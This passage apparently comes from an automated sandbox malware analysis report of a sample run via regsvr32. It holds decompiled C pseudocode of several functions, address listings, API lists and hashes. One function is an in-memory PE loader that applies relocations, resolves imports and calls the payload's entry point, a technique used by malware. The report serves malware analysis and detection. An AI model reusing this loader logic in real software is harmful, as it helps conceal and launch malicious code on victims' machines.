					_t110 =  *0x4b0f820; // 0x4c2faa0
					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
				}
				if(E04AFC9F4(_t173) != 0) {
					L4:
					_t56 = E04AFC6CE();
					_push(_t113);
					_v592 = _t56;
					E04AFC4C1(_t56,  &_v580, _t190, _t192);
					_t114 = E04AF5072( &_v580,  &_v580, _t190);
					_t126 = E04AFE2C5( &_v580, E04AFA43D( &_v580), 0);
					E04AFC6E4(_t126,  &_v548, _t192);
					_push(_t126);
					_t161 =  &_v580;
					_t63 = E04AF317E(_t173,  &_v580, _t190, _t192);
					_v600 = _t63;
					if(_t63 != 0) {
						_push(0);
						_push(_t114);
						_push(0x4b0c9a0);
						_t115 = E04AF9A5A(_t63);
						_t186 = _t185 + 0x10;
						_t65 =  *0x4b0f81c; // 0x4c2fbe8
						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
							L12:
							__eflags = _v596;
							if(__eflags != 0) {
								_t66 = E04AF98BD(_v600);
								_t130 = _t115;
								 *0x4b0f8d8 = _t66;
								 *0x4b0f8d0 = E04AF98BD(_t130);
								L17:
								_push(_t130);
								_t174 = E04AFA633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
								_t187 = _t186 + 0x10;
								__eflags = _t174;
								if(_t174 == 0) {
									goto L41;
								}
								_push(0x4b0c9f2);
								_t163 = 0xe;
								E04AFAAA3(_t163, _t192);
								E04AFAADC(_t174, _t192, _t115);
								_t180 = _a4;
								_push( *_t180);
								E04AFAA7E(0xb);
								_t165 =  *(_t180 + 0x10);
								__eflags =  *(_t180 + 0x10);
								if( *(_t180 + 0x10) != 0) {
									E04AFB025(_t165, _t192);
								}
								_t166 =  *(_t180 + 0xc);
								__eflags = _t166;
								if(_t166 != 0) {
									E04AFB025(_t166, _t192);
								}
								_t76 = E04AFA065(0);
								_push(_t166);
								_t167 = 2;
								_t77 = E04AFAA50();
								__eflags = _v596;
								_t142 = _t76;
								if(_v596 == 0) {
									_t142 =  *0x4b0f81c; // 0x4c2fbe8
									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t78 = E04B00D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
										_t187 =  &(_t187[3]);
										goto L26;
									}
									_t142 = _t142 + 0x228;
									goto L25;
								} else {
									_t79 =  *0x4b0f81c; // 0x4c2fbe8
									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t79 + 0x1898) & 0x00000082;
										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
											_t169 = 0x64;
											E04AFF0DE(_t169);
										}
										E04AF584B( &_v580, _t192);
										_t176 = _a8;
										_t143 = _t142;
										__eflags = _t176;
										if(_t176 != 0) {
											_t82 =  *0x4b0f81c; // 0x4c2fbe8
											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
												lstrcpyW(_t176, _t115);
											} else {
												_t84 = E04AF109A(_t143, 0x49f);
												_v596 = _t84;
												lstrcpyW(_t176, _t84);
												E04AF8BAF( &_v596);
												 *_t187 = 0x4b0c9b0;
												lstrcatW(_t176, ??);
												lstrcatW(_t176, _t115);
												lstrcatW(_t176, 0x4b0c9b0);
											}
										}
										_t81 = _a12;
										__eflags = _t81;
										if(_t81 != 0) {
											 *_t81 = _v592;
										}
										_t178 = 0;
										__eflags = 0;
										goto L41;
									}
									_t40 = _t79 + 0x228; // 0x4c2fe10
									_t142 = _t40;
									L25:
									_t78 = E04AF5AC0(_t142, _t115, __eflags);
									L26:
									__eflags = _t78;
									if(_t78 >= 0) {
										_t79 =  *0x4b0f81c; // 0x4c2fbe8
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t178);
									goto L41;
								}
							}
							_t94 = E04AFD11F(_v592, __eflags);
							_v600 = _t94;
							_t95 =  *0x4b0f818; // 0x4c2f8b0
							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t96 - _t178;
							if(_t96 != _t178) {
								_t97 =  *0x4b0f818; // 0x4c2f8b0
								 *((intOrPtr*)(_t97 + 0x30))();
								E04AF8BF4( &_v636, _t178);
								_t130 = _t96;
								goto L17;
							}
							E04AF8BF4( &_v632, _t178);
							_t72 = 1;
							goto L42;
						}
						_t18 = _t65 + 0x1898; // 0x0
						_t104 =  *_t18;
						__eflags = _t104 & 0x00000004;
						if((_t104 & 0x00000004) == 0) {
							__eflags = _t104;
							if(_t104 != 0) {
								goto L12;
							}
							L11:
							E04AFF1F6(_v600, _t161);
							goto L12;
						}
						E04AFF1B6(_v600,  &_v580);
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t107 = E04AF3097( &_v532, _t178, 0x105);
					_t190 = _t107;
					if(_t107 == 0) {
						L41:
						E04AF5F6F( &_v588);
						_t72 = _t178;
						L42:
						return _t72;
					}
					goto L4;
				}
			}


























































                                                                                                                                                                                              0x04af50b3
                                                                                                                                                                                              0x04af50c0
                                                                                                                                                                                              0x04af50cb
                                                                                                                                                                                              0x04af50d0
                                                                                                                                                                                              0x04af50d2
                                                                                                                                                                                              0x04af50d5
                                                                                                                                                                                              0x04af50da
                                                                                                                                                                                              0x04af50df
                                                                                                                                                                                              0x04af50e2
                                                                                                                                                                                              0x04af50ec
                                                                                                                                                                                              0x04af50ee
                                                                                                                                                                                              0x04af50f3
                                                                                                                                                                                              0x04af50fb
                                                                                                                                                                                              0x04af5104
                                                                                                                                                                                              0x04af5104
                                                                                                                                                                                              0x04af5111
                                                                                                                                                                                              0x04af512c
                                                                                                                                                                                              0x04af512e
                                                                                                                                                                                              0x04af5133
                                                                                                                                                                                              0x04af5138
                                                                                                                                                                                              0x04af513e
                                                                                                                                                                                              0x04af514d
                                                                                                                                                                                              0x04af516c
                                                                                                                                                                                              0x04af516e
                                                                                                                                                                                              0x04af5173
                                                                                                                                                                                              0x04af5174
                                                                                                                                                                                              0x04af517a
                                                                                                                                                                                              0x04af517f
                                                                                                                                                                                              0x04af5186
                                                                                                                                                                                              0x04af5190
                                                                                                                                                                                              0x04af5192
                                                                                                                                                                                              0x04af5193
                                                                                                                                                                                              0x04af519e
                                                                                                                                                                                              0x04af51a0
                                                                                                                                                                                              0x04af51a3
                                                                                                                                                                                              0x04af51a8
                                                                                                                                                                                              0x04af51af
                                                                                                                                                                                              0x04af51d3
                                                                                                                                                                                              0x04af51d3
                                                                                                                                                                                              0x04af51d8
                                                                                                                                                                                              0x04af523f
                                                                                                                                                                                              0x04af5244
                                                                                                                                                                                              0x04af5246
                                                                                                                                                                                              0x04af5250
                                                                                                                                                                                              0x04af5255
                                                                                                                                                                                              0x04af5255
                                                                                                                                                                                              0x04af526f
                                                                                                                                                                                              0x04af5271
                                                                                                                                                                                              0x04af5274
                                                                                                                                                                                              0x04af5276
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af527c
                                                                                                                                                                                              0x04af5283
                                                                                                                                                                                              0x04af5286
                                                                                                                                                                                              0x04af528f
                                                                                                                                                                                              0x04af5294
                                                                                                                                                                                              0x04af529a
                                                                                                                                                                                              0x04af529f
                                                                                                                                                                                              0x04af52a4
                                                                                                                                                                                              0x04af52a8
                                                                                                                                                                                              0x04af52aa
                                                                                                                                                                                              0x04af52ae
                                                                                                                                                                                              0x04af52ae
                                                                                                                                                                                              0x04af52b3
                                                                                                                                                                                              0x04af52b6
                                                                                                                                                                                              0x04af52b8
                                                                                                                                                                                              0x04af52bc
                                                                                                                                                                                              0x04af52bc
                                                                                                                                                                                              0x04af52c3
                                                                                                                                                                                              0x04af52c8
                                                                                                                                                                                              0x04af52cc
                                                                                                                                                                                              0x04af52cf
                                                                                                                                                                                              0x04af52d4
                                                                                                                                                                                              0x04af52da
                                                                                                                                                                                              0x04af52db
                                                                                                                                                                                              0x04af5303
                                                                                                                                                                                              0x04af5309
                                                                                                                                                                                              0x04af5310
                                                                                                                                                                                              0x04af531f
                                                                                                                                                                                              0x04af5324
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af5324
                                                                                                                                                                                              0x04af5312
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af52dd
                                                                                                                                                                                              0x04af52dd
                                                                                                                                                                                              0x04af52e2
                                                                                                                                                                                              0x04af52e9
                                                                                                                                                                                              0x04af532e
                                                                                                                                                                                              0x04af532e
                                                                                                                                                                                              0x04af5335
                                                                                                                                                                                              0x04af5339
                                                                                                                                                                                              0x04af533a
                                                                                                                                                                                              0x04af533a
                                                                                                                                                                                              0x04af5344
                                                                                                                                                                                              0x04af5349
                                                                                                                                                                                              0x04af534c
                                                                                                                                                                                              0x04af534d
                                                                                                                                                                                              0x04af534f
                                                                                                                                                                                              0x04af5351
                                                                                                                                                                                              0x04af5356
                                                                                                                                                                                              0x04af535d
                                                                                                                                                                                              0x04af53a0
                                                                                                                                                                                              0x04af535f
                                                                                                                                                                                              0x04af5364
                                                                                                                                                                                              0x04af536c
                                                                                                                                                                                              0x04af5370
                                                                                                                                                                                              0x04af537b
                                                                                                                                                                                              0x04af5386
                                                                                                                                                                                              0x04af538e
                                                                                                                                                                                              0x04af5392
                                                                                                                                                                                              0x04af539a
                                                                                                                                                                                              0x04af539a
                                                                                                                                                                                              0x04af535d
                                                                                                                                                                                              0x04af53a6
                                                                                                                                                                                              0x04af53a9
                                                                                                                                                                                              0x04af53ab
                                                                                                                                                                                              0x04af53b1
                                                                                                                                                                                              0x04af53b1
                                                                                                                                                                                              0x04af53b3
                                                                                                                                                                                              0x04af53b3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af53b3
                                                                                                                                                                                              0x04af52eb
                                                                                                                                                                                              0x04af52eb
                                                                                                                                                                                              0x04af52f1
                                                                                                                                                                                              0x04af52f3
                                                                                                                                                                                              0x04af52f8
                                                                                                                                                                                              0x04af52f8
                                                                                                                                                                                              0x04af52fa
                                                                                                                                                                                              0x04af5329
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af5329
                                                                                                                                                                                              0x04af52fc
                                                                                                                                                                                              0x04af518a
                                                                                                                                                                                              0x04af518a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af518a
                                                                                                                                                                                              0x04af52db
                                                                                                                                                                                              0x04af51de
                                                                                                                                                                                              0x04af51ec
                                                                                                                                                                                              0x04af51ff
                                                                                                                                                                                              0x04af5204
                                                                                                                                                                                              0x04af520a
                                                                                                                                                                                              0x04af520c
                                                                                                                                                                                              0x04af5224
                                                                                                                                                                                              0x04af5229
                                                                                                                                                                                              0x04af5232
                                                                                                                                                                                              0x04af5238
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af5238
                                                                                                                                                                                              0x04af5214
                                                                                                                                                                                              0x04af521d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af521d
                                                                                                                                                                                              0x04af51b1
                                                                                                                                                                                              0x04af51b1
                                                                                                                                                                                              0x04af51b7
                                                                                                                                                                                              0x04af51b9
                                                                                                                                                                                              0x04af51c6
                                                                                                                                                                                              0x04af51c8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af51ca
                                                                                                                                                                                              0x04af51ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af51ce
                                                                                                                                                                                              0x04af51bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af51bf
                                                                                                                                                                                              0x04af5188
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af5113
                                                                                                                                                                                              0x04af511e
                                                                                                                                                                                              0x04af5124
                                                                                                                                                                                              0x04af5126
                                                                                                                                                                                              0x04af53b5
                                                                                                                                                                                              0x04af53b9
                                                                                                                                                                                              0x04af53be
                                                                                                                                                                                              0x04af53c0
                                                                                                                                                                                              0x04af53c6
                                                                                                                                                                                              0x04af53c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af5126

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1985475764-0
                                                                                                                                                                                              • Opcode ID: a50b622f3b057ead417675c20d6924b0c301a67212178b1a1e1809c044581a87
                                                                                                                                                                                              • Instruction ID: c11c711f1d68dea59ad9cf3dde6efb20b474a3c83a23ff2dd2895087d255f734
                                                                                                                                                                                              • Opcode Fuzzy Hash: a50b622f3b057ead417675c20d6924b0c301a67212178b1a1e1809c044581a87
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A81F371B04300ABE724EFA4DD44BBF73E9EB80314F14462EF6558B291EBB4B8458A91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFDE26 Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E04AFDE26(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x4b0c9a0);
						_t36 = E04AF9A5A( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E04AF8BF4( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















                                                                                                                                                                                              0x04afde2f
                                                                                                                                                                                              0x04afde36
                                                                                                                                                                                              0x04afde39
                                                                                                                                                                                              0x04afde46
                                                                                                                                                                                              0x04afde4c
                                                                                                                                                                                              0x04afde4f
                                                                                                                                                                                              0x04afde51
                                                                                                                                                                                              0x04afde56
                                                                                                                                                                                              0x04afdf2e
                                                                                                                                                                                              0x04afdf2e
                                                                                                                                                                                              0x04afdf2e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afde5c
                                                                                                                                                                                              0x04afde5c
                                                                                                                                                                                              0x04afde5c
                                                                                                                                                                                              0x04afde5f
                                                                                                                                                                                              0x04afde65
                                                                                                                                                                                              0x04afde81
                                                                                                                                                                                              0x04afde88
                                                                                                                                                                                              0x04afde8e
                                                                                                                                                                                              0x04afde92
                                                                                                                                                                                              0x04afdea6
                                                                                                                                                                                              0x04afdea6
                                                                                                                                                                                              0x04afdea9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afde94
                                                                                                                                                                                              0x04afde94
                                                                                                                                                                                              0x04afde99
                                                                                                                                                                                              0x04afde9d
                                                                                                                                                                                              0x04afde9d
                                                                                                                                                                                              0x04afdea1
                                                                                                                                                                                              0x04afdea2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afde94
                                                                                                                                                                                              0x04afdeaa
                                                                                                                                                                                              0x04afdeaa
                                                                                                                                                                                              0x04afdead
                                                                                                                                                                                              0x04afdeae
                                                                                                                                                                                              0x04afdeb5
                                                                                                                                                                                              0x04afdebf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afdec1
                                                                                                                                                                                              0x04afdec7
                                                                                                                                                                                              0x04afdecb
                                                                                                                                                                                              0x04afdf24
                                                                                                                                                                                              0x04afded4
                                                                                                                                                                                              0x04afdee1
                                                                                                                                                                                              0x04afdee7
                                                                                                                                                                                              0x04afdee9
                                                                                                                                                                                              0x04afdef0
                                                                                                                                                                                              0x04afdef6
                                                                                                                                                                                              0x04afdefe
                                                                                                                                                                                              0x04afdf06
                                                                                                                                                                                              0x04afdf12
                                                                                                                                                                                              0x04afdf18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afdf2a
                                                                                                                                                                                              0x04afdeb7
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 04AFDE3B
                                                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 04AFDE46
                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 04AFDE88
                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 04AFDEE1
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 04AFDF06
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000104), ref: 04AFDF24
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1259063344-0
                                                                                                                                                                                              • Opcode ID: 45ddbb497e0699cf0d01326d393b0622fe790283ebbb3297a13da561601d1e0e
                                                                                                                                                                                              • Instruction ID: 0ae5027444643c1abc018bdb52d7d60ed7b1168bcbcfe51e7c7d5785cca2951c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 45ddbb497e0699cf0d01326d393b0622fe790283ebbb3297a13da561601d1e0e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B31F2B1900116EBDB26ABE4CC88EADB779EF11311F10455AF607E7090E770A981CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFE656 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 04AFE66A
                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 04AFE672
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 04AFE686
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 04AFE701
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 04AFE704
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 04AFE709
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 344208780-0
                                                                                                                                                                                              • Opcode ID: ba6d8948a74a80cd49d99dca50d32ffa8c99d68dc9488645b2141899a51fc5b1
                                                                                                                                                                                              • Instruction ID: c36ef7954805e68c00062e695b22baa3747d09cc974a96ba3bfa1ef71bcafac5
                                                                                                                                                                                              • Opcode Fuzzy Hash: ba6d8948a74a80cd49d99dca50d32ffa8c99d68dc9488645b2141899a51fc5b1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C21DDB5900218BFDB04DFE9CD88DAFBBBDEF48654B10445AF505E7250EA71AE01DB60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04B03D66 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                                                              			E04B03D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































                                                                                                                                                                                              0x04b03d6f
                                                                                                                                                                                              0x04b03d7c
                                                                                                                                                                                              0x04b03d82
                                                                                                                                                                                              0x04b03d8b
                                                                                                                                                                                              0x04b03d8e
                                                                                                                                                                                              0x04b03d91
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b03e82
                                                                                                                                                                                              0x04b03e86
                                                                                                                                                                                              0x04b03e88
                                                                                                                                                                                              0x04b03e96
                                                                                                                                                                                              0x04b03fb4
                                                                                                                                                                                              0x04b03fb8
                                                                                                                                                                                              0x04b0407d
                                                                                                                                                                                              0x04b04086
                                                                                                                                                                                              0x04b04089
                                                                                                                                                                                              0x04b0408d
                                                                                                                                                                                              0x04b04093
                                                                                                                                                                                              0x04b0409b
                                                                                                                                                                                              0x04b0409b
                                                                                                                                                                                              0x04b040a3
                                                                                                                                                                                              0x04b040b1
                                                                                                                                                                                              0x04b040b4
                                                                                                                                                                                              0x04b040b8
                                                                                                                                                                                              0x04b040be
                                                                                                                                                                                              0x04b040ce
                                                                                                                                                                                              0x04b040f9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b040fb
                                                                                                                                                                                              0x04b040d4
                                                                                                                                                                                              0x04b040e5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b040f3
                                                                                                                                                                                              0x04b040f7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b040f3
                                                                                                                                                                                              0x04b040e7
                                                                                                                                                                                              0x04b040eb
                                                                                                                                                                                              0x04b040f0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b040f0
                                                                                                                                                                                              0x04b040d6
                                                                                                                                                                                              0x04b040da
                                                                                                                                                                                              0x04b040dc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b040dc
                                                                                                                                                                                              0x04b040c0
                                                                                                                                                                                              0x04b040c4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b040c6
                                                                                                                                                                                              0x04b03fbe
                                                                                                                                                                                              0x04b03fc2
                                                                                                                                                                                              0x04b03fc4
                                                                                                                                                                                              0x04b03fd2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b03fd8
                                                                                                                                                                                              0x04b03fe1
                                                                                                                                                                                              0x04b03fef
                                                                                                                                                                                              0x04b03ffb
